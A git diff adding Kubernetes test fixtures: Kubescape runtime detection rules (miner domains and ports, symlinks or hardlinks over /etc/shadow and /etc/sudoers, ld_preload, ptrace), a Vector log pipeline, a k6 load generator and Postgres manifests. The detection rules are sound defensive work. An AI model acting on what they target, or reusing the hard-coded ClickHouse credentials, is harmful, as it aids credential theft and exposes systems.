TA0004 + mitreTechnique: T1611 + tags: + - unshare + - escape + - unshare + - anomaly + - applicationprofile + - name: Crypto miner launched + enabled: true + id: R1007 + description: Detecting XMR Crypto Miners by randomx algorithm usage. 
+ expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: randomx + expression: 'true' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + tags: + - crypto + - miners + - malicious + - name: Crypto Mining Domain Communication + enabled: true + id: R1008 + description: Detecting Crypto miners communication by domain + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + uniqueId: event.name + '_' + event.comm + ruleExpression: + - eventType: dns + expression: event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', 'btm.antpool.com.', + 'c3pool.com.', 'c4pool.org.', 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', 'de.minexmr.com.', + 'eth-ar.dwarfpool.com.', 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', 'eth-br.dwarfpool.com.', + 'eth-cn.dwarfpool.com.', 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', 'eth-hk.dwarfpool.com.', + 'eth-jp1.nanopool.org.', 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', 'eth-us-west1.nanopool.org.', + 'eth-us.dwarfpool.com.', 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', 'eu.stratum.slushpool.com.', + 'eu1.ethermine.org.', 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', 'miningmadness.com.', + 'monero.cedric-crispin.com.', 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', 'monerohash.com.', + 'moneroocean.stream.', 'monerop.com.', 'multi-pools.com.', 'p2pool.io.', + 'pool.kryptex.com.', 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', 'prohashing.com.', + 'rx.unmineable.com.', 'sg.minexmr.com.', 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', 'stratum-btm.antpool.com.', + 'stratum-dash.antpool.com.', 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', 'stratum.antpool.com.', + 'supportxmr.com.', 'trustpool.cc.', 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', 'web.xmrpool.eu.', + 'www.domajorpool.com.', 'www.dxpool.com.', 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', 'xmr-eu1.nanopool.org.', + 'xmr-eu2.nanopool.org.', 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', 'xmr.crypto-pool.fr.', + 'xmr.gntl.uk.', 'xmr.nanopool.org.', 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', 'zec.antpool.com.', + 'zergpool.com.', 'auto.c3pool.org.', 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - network + - crypto + - miners + - malicious + - dns + - name: Crypto Mining Related Port Communication + enabled: true + id: R1009 + description: Detecting Crypto 
Miners by suspicious port usage. + expressions: + message: '''Detected crypto mining related port communication on port '' + string(event.dstPort) + + '' to '' + event.dstAddr + '' with protocol '' + event.proto' + uniqueId: event.comm + '_' + string(event.dstPort) + ruleExpression: + - eventType: network + expression: event.proto == 'TCP' && event.pktType == 'OUTGOING' && event.dstPort + in [3333, 45700] && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 1 + severity: 3 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - name: Soft link created over sensitive file + enabled: true + id: R1010 + description: Detects symlink creation over sensitive files + expressions: + message: '''Symlink created over sensitive file: '' + event.oldPath + '' -> + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: symlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - anomaly + - symlink + - applicationprofile + - name: ld_preload hooks technique detected + enabled: false + id: R1011 + description: Detecting ld_preload hook techniques. + expressions: + message: 'eventType == ''exec'' ? ''Process ('' + event.comm + '') is using + a dynamic linker hook: '' + process.get_ld_hook_var(event.pid) : ''The dynamic + linker configuration file ('' + event.path + '') was modified by process ('' + + event.comm + '')''' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + ruleExpression: + - eventType: exec + expression: event.comm != 'java' && event.containerName != 'matlab' && process.get_ld_hook_var(event.pid) + != '' + - eventType: open + expression: event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && event.flagsRaw + != 0 + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + tags: + - exec + - malicious + - applicationprofile + - name: Hard link created over sensitive file + enabled: true + id: R1012 + description: Detecting hardlink creation over sensitive files. + expressions: + message: '''Hardlink created over sensitive file: '' + event.oldPath + '' - + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: hardlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - malicious + - applicationprofile + - name: Malicious Ptrace Usage + enabled: true + id: R1015 + description: Detecting potentially malicious ptrace usage. 
+ expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: ptrace + expression: 'true' + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + tags: + - process + - malicious + - name: Unexpected io_uring Operation Detected + enabled: true + id: R1030 + description: Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + expressions: + message: '''Unexpected io_uring operation detected: (opcode='' + string(event.opcode) + + '') flags=0x'' + (has(event.flagsRaw) ? string(event.flagsRaw) : ''0'') + + '' in '' + event.comm + ''.''' + uniqueId: string(event.opcode) + '_' + event.comm + ruleExpression: + - eventType: iouring + expression: 'true' + profileDependency: 0 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + tags: + - syscalls + - io_uring + - applicationprofile +--- +apiVersion: kubescape.io/v1 +kind: RuntimeRuleAlertBinding +metadata: + name: all-rules-all-pods + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + namespaceSelector: + matchExpressions: + - key: kubernetes.io/metadata.name + operator: NotIn + values: + - kubescape + - kube-system + - kube-flannel + - ingress-nginx + - olm + - px-operator + - honey + - pl + - clickhouse + - kube-public + - kube-node-lease + - local-path-storage + - gmp-system + - gmp-public + - storm + - lightening + - cert-manager + rules: + - ruleName: Unexpected process launched + - ruleName: Files Access Anomalies in container + - ruleName: Syscalls Anomalies in container + - ruleName: Linux Capabilities Anomalies in container + - ruleName: DNS Anomalies in container + - ruleName: Unexpected service account token access + - ruleName: Workload uses Kubernetes API unexpectedly + - ruleName: Process executed from malicious source + - ruleName: Process tries to load a kernel module + - ruleName: Drifted process executed + - ruleName: Disallowed ssh connection + - ruleName: Fileless execution detected + - ruleName: Crypto miner launched + - ruleName: Process executed from mount + - ruleName: Crypto Mining Related Port Communication + - ruleName: Crypto Mining Domain Communication + - ruleName: Read Environment Variables from procfs + - ruleName: eBPF Program Load + - ruleName: Soft link created over sensitive file + - ruleName: Unexpected Sensitive File Access + - ruleName: Hard link created over sensitive file + - ruleName: Exec to pod + - ruleName: Port forward + - ruleName: Unexpected Egress Network Traffic + - ruleName: Malicious Ptrace Usage + - ruleName: Unexpected io_uring Operation Detected +--- +apiVersion: admissionregistration.k8s.io/v1 +kind: ValidatingWebhookConfiguration +metadata: + name: validation + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: 
kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +webhooks: +- name: validation.kubescape.admission + clientConfig: + service: + name: kubescape-admission-webhook + namespace: honey + path: /validate + port: 443 + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURGekNDQWYrZ0F3SUJBZ0lRSWZrRGU0S0h2aFE1TlNGUWovWFk0ekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1CWXhGREFTQmdOVkJBTU1DeW91YUc5dVpYa3VjM1pqTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGCkFBT0NBUThBTUlJQkNnS0NBUUVBdzNWR1Nqc203dFNOeWwzdSsrY3FmdkplSmdRTDhwZG1qK0RBZWQya25oRE0KbVJWOHZtdXR1Unc2SE9rdlR4UmsyZnZUMWptRndHYWxMMVhqQ3M0SzZNQUJHS2VNTitpZUFIb0VXSXUzUENYYgpVdHc4SmVCNEZQWkpadEs5U0VLWElzVWVleTRBam5UNzFncmh0TkZkWFNoT2Y1a1AwaFlMR3V6MUFyaEUxR2pNCmlIaEJ4OWc1a1I1ZnpLcUphYVFZUk15ZnVlYmZVVUZjb2FyOG8xL1I2d1k0cE42KzdPYlE3UUhTSGM1bFN0SXoKWE50L0xjUjNIU0xVdVdEWkQ0UmN3dE1HSkEwRGdLcUExT1VrdzVSWW9DM3JVMHVlRG1rK2pzRVUrQUNDTEdqagpoYk9tcHJoSGs4bkkzcXRNYmM2bFVRRmlCdkRkSzFpdVd0Y3ZoOXNmbndJREFRQUJvMkV3WHpBT0JnTlZIUThCCkFmOEVCQU1DQXFRd0hRWURWUjBsQkJZd0ZBWUlLd1lCQlFVSEF3RUdDQ3NHQVFVRkJ3TUNNQThHQTFVZEV3RUIKL3dRRk1BTUJBZjh3SFFZRFZSME9CQllFRk54aGhTcjRmaFJydVJwWlpueVJZSlFqcDVaOE1BMEdDU3FHU0liMwpEUUVCQ3dVQUE0SUJBUUJLT0hDaGNoTHQwcS9DaGhJdUtSZ1Q4VUY4OXpWY2hPZzI2Q0J4cWFOQk1vRnhwZE43CmxzZ1VjSGpXY0FaalFRZlI3UlhORDkxL25pL0l6QjBGb2JqKzZPY2tncXNydlZQZzlJc29kTjhJTi9tZkJ1cG4KdkFpY0JyNFd5RHI0dFA3Yk1Ma1RKU2p6UVpOT2E1NVMvTTNRU0xOOW5IVWM0MW5nVUFyeUtXUDdCancySlRZNQprR1lDNWdXZjJXR0F6aG1tMjJmbmZrMXNPK0N1TnErSlBqWmNrR210ZUhCbkNnYUNsblRaNkFkeFUySWd6UlFZCndNUHpJajJBVUkzMXlNZlZLMkZmOU5NV0M0YVAwUk4va3cwaXNOaVpVR1NaZTAzQk05L3hhSy93VkJ1d3BFdlAKVjhYcGwrREtXWFkwcVZaMWwzTk5SNUJFSG5qZldKYisraUROCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + admissionReviewVersions: + - v1 + sideEffects: None + rules: + - operations: + - CREATE + - UPDATE + - DELETE + - CONNECT + apiGroups: + - '*' + apiVersions: + - v1 + resources: + - pods + - pods/exec + - pods/portforward + - pods/attach + - clusterrolebindings + - rolebindings + scope: '*' + failurePolicy: Ignore diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml new file mode 100644 index 00000000000..051fb34d176 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml @@ -0,0 +1,87 @@ +# Vector Helm values for iximiuz lab — kubescape node-agent → ClickHouse +# Deploy: helm install vector vector/vector -n honey -f values.yaml + +role: "Agent" + +image: + repository: timberio/vector + pullPolicy: IfNotPresent + +resources: + requests: + cpu: 50m + memory: 64Mi + limits: + cpu: 200m + memory: 128Mi + +tolerations: + - operator: Exists + +env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + +customConfig: + data_dir: /vector-data-dir + api: + enabled: true + address: 127.0.0.1:8686 + playground: false + + sources: + kubescape_nodeagent_logs: + type: kubernetes_logs + extra_label_selector: "app=node-agent" + + transforms: + kubescape_parse: + type: remap + inputs: + - kubescape_nodeagent_logs + source: | + . 
= parse_json!(.message) + + kubescape_filter: + type: filter + inputs: + - kubescape_parse + condition: '.BaseRuntimeMetadata != null' + + kubescape_enrich: + type: remap + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + + sinks: + kubescape_debug: + type: file + inputs: + - kubescape_enrich + encoding: + codec: json + path: "/tmp/kubescape.json" + + kubescape_clickhouse: + type: clickhouse + inputs: + - kubescape_enrich + database: forensic_db + table: kubescape_logs + endpoint: "http://clickhouse.forensic.austrianopencloudcommunity.org:8123" + skip_unknown_fields: true + date_time_best_effort: true + auth: + strategy: "basic" + user: pixie + password: pixie_password + batch: + max_bytes: 5000000 + timeout_secs: 2 diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml new file mode 100644 index 00000000000..ed14ac92b4e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml @@ -0,0 +1,307 @@ +--- +# Source: vector/templates/serviceaccount.yaml +apiVersion: v1 +kind: ServiceAccount +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +automountServiceAccountToken: true +--- +# Source: vector/templates/configmap.yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +data: + vector.yaml: | + api: + address: 127.0.0.1:8686 + enabled: true + playground: false + data_dir: /vector-data-dir + sinks: + kubescape_clickhouse: + auth: + password: pixie_password + strategy: basic + user: pixie + batch: + max_bytes: 5000000 + timeout_secs: 2 + database: forensic_db + date_time_best_effort: true + endpoint: http://clickhouse.forensic.austrianopencloudcommunity.org:8123 + inputs: + - kubescape_enrich + skip_unknown_fields: true + table: kubescape_logs + type: clickhouse + kubescape_debug: + encoding: + codec: json + inputs: + - kubescape_enrich + path: /tmp/kubescape.json + type: file + sources: + kubescape_nodeagent_logs: + extra_label_selector: app=node-agent + type: kubernetes_logs + transforms: + kubescape_enrich: + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + type: remap + kubescape_filter: + condition: .BaseRuntimeMetadata != null + inputs: + - kubescape_parse + type: filter + kubescape_parse: + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + type: remap +--- +# Source: vector/templates/rbac.yaml +# Permissions to use Kubernetes API. +# Requires that RBAC authorization is enabled. 
+apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +rules: + - apiGroups: + - "" + resources: + - namespaces + - nodes + - pods + verbs: + - list + - watch +--- +# Source: vector/templates/rbac.yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: vector +subjects: + - kind: ServiceAccount + name: vector + namespace: "honey" +--- +# Source: vector/templates/service-headless.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector-headless + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + clusterIP: None + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/service.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/daemonset.yaml +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +spec: + selector: + matchLabels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + minReadySeconds: 0 + template: + metadata: + annotations: + checksum/config: 6840eb68ad4549d7f15ba76da2b37fd179c92f96d58d1ae0f60ff90a4b9e5554 + labels: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + vector.dev/exclude: "true" + spec: + serviceAccountName: vector + dnsPolicy: ClusterFirst + containers: + - name: vector + image: "timberio/vector:0.54.0-distroless-libc" + imagePullPolicy: IfNotPresent + args: + - --config-dir + - /etc/vector/ + env: + - name: VECTOR_LOG + value: "info" + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: VECTOR_SELF_POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: VECTOR_SELF_POD_NAMESPACE + valueFrom: + 
fieldRef: + fieldPath: metadata.namespace + - name: PROCFS_ROOT + value: "/host/proc" + - name: SYSFS_ROOT + value: "/host/sys" + ports: + - name: api + containerPort: 8686 + protocol: TCP + resources: + limits: + cpu: 200m + memory: 128Mi + requests: + cpu: 50m + memory: 64Mi + volumeMounts: + - name: data + mountPath: "/vector-data-dir" + - name: config + mountPath: "/etc/vector/" + readOnly: true + - mountPath: /var/log/ + name: var-log + readOnly: true + - mountPath: /var/lib + name: var-lib + readOnly: true + - mountPath: /host/proc + name: procfs + readOnly: true + - mountPath: /host/sys + name: sysfs + readOnly: true + terminationGracePeriodSeconds: 60 + tolerations: + - operator: Exists + volumes: + - name: config + projected: + sources: + - configMap: + name: vector + - name: data + hostPath: + path: "/var/lib/vector" + - hostPath: + path: /var/log/ + name: var-log + - hostPath: + path: /var/lib/ + name: var-lib + - hostPath: + path: /proc + name: procfs + - hostPath: + path: /sys + name: sysfs diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml new file mode 100644 index 00000000000..e11cec84c5a --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/loadgen-k6.yaml @@ -0,0 +1,133 @@ +# loadgen — tier 1 (HTTP client) hammering the API backend so all three +# tiers carry sustained traffic for the duration of the experiment. +# k6 chosen over fortio/hey because we want: +# - mixed verbs (~80% GET, ~20% POST) to keep both cache + DB paths hot +# - randomized GET ids to vary cache hit ratio +# - one container image, declarative script, no per-target script files +# +# Tunables (override via env on the Deployment): +# K6_VUS: concurrent virtual users (default 50) +# K6_QPS: target requests/sec (default 500). At 500 QPS sustained, +# expect ~550 redis ops/sec + ~50-100 pgsql ops/sec at steady +# state (depending on cache TTL turnover). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: loadgen-k6-script + namespace: redis + labels: + app.kubernetes.io/name: loadgen + app.kubernetes.io/part-of: sovereign-soc +data: + script.js: | + import http from 'k6/http'; + import { check, sleep } from 'k6'; + + const API = __ENV.API_URL || 'http://api:8080'; + + // constant-arrival-rate gives a stable QPS regardless of API latency. + // preAllocatedVUs is the steady-state worker pool; maxVUs caps the + // upper bound k6 will spawn under tail latency. K6_DURATION='8760h' + // is effectively infinite (1 year) — k6 doesn't have a true forever + // mode and the default executor rejects duration=0. + export const options = { + scenarios: { + steady: { + executor: 'constant-arrival-rate', + rate: Number(__ENV.K6_QPS || 500), + timeUnit: '1s', + duration: __ENV.K6_DURATION || '8760h', + preAllocatedVUs: Number(__ENV.K6_VUS || 50), + maxVUs: Number(__ENV.K6_MAX_VUS || 200), + }, + }, + }; + + export default function () { + const r = Math.random(); + if (r < 0.80) { + // Hot path: random GET 1..100. Cache hit/miss mix depends on TTL. + const id = 1 + Math.floor(Math.random() * 100); + const res = http.get(`${API}/api/item/${id}`, { tags: { op: 'get_item' } }); + check(res, { 'GET 200': (r) => r.status === 200 }); + } else { + // Write path: append to events table, busts a few cache entries. 
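+        // (The cache invalidation itself happens server-side in the api
+        // tier; from k6's point of view this is just a 201-checked POST.)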
+        const body = JSON.stringify({ ts: Date.now(), val: Math.random() });
+        const res = http.post(`${API}/api/event`, body, {
+          headers: { 'Content-Type': 'application/json' },
+          tags: { op: 'post_event' },
+        });
+        check(res, { 'POST 201': (r) => r.status === 201 });
+      }
+    }
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: loadgen
+  namespace: redis
+  labels:
+    app.kubernetes.io/name: loadgen
+    app.kubernetes.io/part-of: sovereign-soc
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app.kubernetes.io/name: loadgen
+  template:
+    metadata:
+      labels:
+        app.kubernetes.io/name: loadgen
+        app.kubernetes.io/part-of: sovereign-soc
+        # Exclude k6 from kubescape detection — the loadgen is the
+        # adversary in the threat model, not a normal app pod.
+        kubescape.io/ignore: "true"
+    spec:
+      containers:
+      - name: k6
+        image: grafana/k6:0.51.0
+        imagePullPolicy: IfNotPresent
+        command: ["/bin/sh", "-c"]
+        # k6 needs the API to be reachable; the gunicorn pods need ~25 s
+        # to pip-install + start. Retry on connection refused.
+        args:
+        - |
+          set -e
+          until wget -q -O /dev/null --timeout=3 http://api:8080/healthz; do
+            echo "waiting for api..."
+            sleep 2
+          done
+          echo "api reachable, starting k6"
+          exec k6 run \
+            --no-summary \
+            --no-thresholds \
+            /etc/loadgen/script.js
+        # The three K6_* values define the 1× load profile and are
+        # the names MultiTierAppWorkload patches via strategic-merge
+        # for higher multipliers. Always keep all three in this list
+        # so the kustomize merge has a name-key to match on.
+        env:
+        - {name: K6_QPS, value: "500"}
+        - {name: K6_VUS, value: "50"}
+        - {name: K6_MAX_VUS, value: "200"}
+        - {name: API_URL, value: "http://api:8080"}
+        # K6_DURATION intentionally unset — script defaults to '8760h'
+        # (effectively forever). k6 has no true infinite mode and JS
+        # `||` treats '0s' as truthy, so don't pass '0s' here.
+        volumeMounts:
+        - {name: script, mountPath: /etc/loadgen}
+        # At 64× = 32 000 QPS k6 needs both real CPU (request rate is
+        # CPU-bound once the API responds in sub-ms) and a wide memory
+        # budget. Sizing rationale:
+        #   - 3200 preallocated VUs × ~0.5 MB goroutine stack ≈ 1.6 GB
+        #   - 12 800 maxVUs burst × ~0.5 MB ≈ 6 GB worst case
+        #   - k6's own runtime + buffers + JS heap ≈ 1 GB
+        # Without this sizing, the high multipliers get silently starved
+        # (OOM-kills or CFS throttling) and deliver only a fraction of the
+        # configured QPS.
+        resources:
+          requests: {cpu: "4", memory: "1Gi"}
+          limits: {cpu: "16", memory: "8Gi"}
+      volumes:
+      - name: script
+        configMap: {name: loadgen-k6-script}
diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml
new file mode 100644
index 00000000000..5e2c90c1fa0
--- /dev/null
+++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres-sbob.yaml
@@ -0,0 +1,20 @@
+---
+# Empty user-defined ApplicationProfile for the postgres container. See
+# redis-sbob.yaml for the rationale; same pattern, container name `postgres`
+# matches postgres.yaml.
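+#
+# A quick post-deploy sanity check (hypothetical commands; the plural
+# resource name assumes kubescape's storage API is installed):
+#   kubectl -n redis get applicationprofiles postgres-empty
+#   kubectl -n redis get pod -l app.kubernetes.io/name=postgres \
+#     -o jsonpath='{.items[0].metadata.labels.kubescape\.io/user-defined-profile}'
+# The printed label must equal the profile name below, otherwise the
+# node-agent silently falls back to auto-learning.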
+apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
+kind: ApplicationProfile
+metadata:
+  name: postgres-empty
+  namespace: redis
+spec:
+  architectures:
+  - amd64
+  containers:
+  - name: postgres
+    capabilities: null
+    endpoints: null
+    execs: null
+    opens: null
+    syscalls: null
+    rulePolicies: {}
diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml
new file mode 100644
index 00000000000..265d784e99a
--- /dev/null
+++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/postgres.yaml
@@ -0,0 +1,108 @@
+# postgres — tier 3 (persistent data) for the multi-protocol three-tier
+# load fixture. Deployed in the `redis` namespace alongside the existing
+# redis pod so a single Kubescape ApplicationProfile + bobctl attack
+# surface covers the whole stack. Schema seeded by initdb ConfigMap on
+# first boot (idempotent: psql executes /docker-entrypoint-initdb.d/*.sql
+# only when PGDATA is empty).
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: postgres-initdb
+  namespace: redis
+  labels:
+    app.kubernetes.io/name: postgres
+    app.kubernetes.io/part-of: sovereign-soc
+data:
+  init.sql: |
+    -- items: GET path hot table, served from redis cache.
+    CREATE TABLE IF NOT EXISTS items (
+      id INTEGER PRIMARY KEY,
+      name TEXT NOT NULL,
+      data TEXT NOT NULL
+    );
+    -- events: POST path append-only sink, also invalidates redis.
+    CREATE TABLE IF NOT EXISTS events (
+      id BIGSERIAL PRIMARY KEY,
+      created TIMESTAMPTZ NOT NULL DEFAULT now(),
+      payload TEXT NOT NULL
+    );
+    -- Pre-populate 100 items so the loadgen's random-id GET hits a real
+    -- row most of the time (cache hit/miss ratio is observable in
+    -- redis_events vs pgsql_events rate).
+    INSERT INTO items (id, name, data)
+    SELECT i,
+           'item-' || i,
+           md5(i::text) || md5((i+1)::text) || md5((i+2)::text)
+    FROM generate_series(1, 100) AS s(i)
+    ON CONFLICT (id) DO NOTHING;
+    CREATE INDEX IF NOT EXISTS events_created_idx ON events (created DESC);
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: postgres
+  namespace: redis
+  labels:
+    app.kubernetes.io/name: postgres
+    app.kubernetes.io/part-of: sovereign-soc
+spec:
+  replicas: 1
+  strategy:
+    type: Recreate
+  selector:
